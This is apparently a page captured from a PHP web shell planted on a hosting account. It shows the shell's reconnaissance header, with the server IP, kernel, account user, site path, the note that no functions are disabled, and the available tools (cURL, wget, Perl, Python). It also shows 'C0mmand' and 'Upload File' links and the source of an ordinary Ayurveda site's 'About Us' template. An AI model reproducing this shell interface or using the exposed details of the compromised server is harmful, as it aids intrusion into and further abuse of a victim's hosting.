Server IP : 103.53.40.154 / Your IP : 18.191.97.229 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/yugayurvedaold.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="format-detection" content="telephone=no"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="author" content=""> <meta name="keywords" content=""> <meta name="description" content=""> <?php include "top-links.php";?> <title><?= $dataabout['site_pages_meta_title'] ?></title> <meta name="description" content="<?= $dataabout['site_pages_meta_description'] ?>"> </head> <body> <div class="ps-page"> <?php include "header.php";?> <div class="bread"> <div class="container"> <div class="title"> <h1>About Us</h1> <ul class="breadcrumb"> <li><a href="#">Home</a></li> <li>About Us</li> </ul> </div> </div> </div> <section class="about-sectoion mt-5 mb-3"> <div class="container"> <div class="row"> <div class="col-lg-6"> <img src="imgs/capsule.jpeg" width="100%"> </div> <div class="col-lg-6"> <div class="text-center"> <h2>About Us</h2> </div> <p> <?= $dataabout['site_pages_description'] ?> </p> </div> </div> </div> </section> <?php include "footer.php";?> </div> </body> </html>